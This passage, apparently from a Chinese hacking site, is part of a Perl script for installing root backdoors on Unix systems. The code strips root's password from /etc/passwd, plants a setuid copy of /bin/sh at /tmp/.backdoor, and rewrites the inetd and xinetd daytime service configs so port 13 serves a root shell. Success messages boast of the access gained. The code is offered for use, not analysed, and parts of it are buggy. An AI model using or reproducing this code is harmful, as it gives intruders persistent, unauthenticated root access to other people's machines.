) { chop; $passwd.="$_\n"; last; } chomp $passwd; if($passwd eq "root:x:0:0:root:/root:/bin/bash") { $passwd =~s/x//g; print "rushroot sUCcess!now you can get a rootshell with null passwd"; } else { print "faild....something wrong....:((("; } while(
) { chomp; $passwd1.="$_\n"; } close PWD; open (PWD,">/etc/passwd")die "why?"; print PWD $passwd; print PWD $passwd1; } sub fakebackdoor { @cpsh = ("cp", "/bin/sh /tmp/.backdoor"); @chmod= ("chmod","u+s /tmp/.backdoor"); system(@cpsh); system(@chmod); print "success! now you can use ./tmp/.backdoor to get a root shell\n"; } sub rushport1 { open (RH6,"/etc/inetd.d/inetd.conf") die "cannt find the shadow file!\n"; #这里根据版本不同可自己修改路径 while() { chomp; $passwd.="$_\n"; chomp $passwd; if ($passwd eq "daytime stream tcp nowait root internal") { $passwd =~s/root internal/bin\/sh -i/g; } last; close RH6; open (RH6,">/etc/inetd.d/inetd.conf")die "faild...:("; # #这里根据版本不同可自己修改路径 print RH6 $passwd; print "success! now you can telnet romote host at port 13 after reboot the daytime session\n"; } } sub rushport2 { open (DAYTIME,">/etc/xinetd.d/daytime") die "can't open file!"; $daytime = "service daytime\n {\n disable = no\n server =/bin/sh\n server_agrs = --norc\n id = daytime-stream\n socket_type = stream\n protocol = tcp\n user = root\n wait = no\n }\n"; print DAYTIME $daytime; print "success! now you can telnet romote host at port 13 after reboot the daytime session\n"; }
[1] [2] 下一页
(出处:http://www.sheup.com)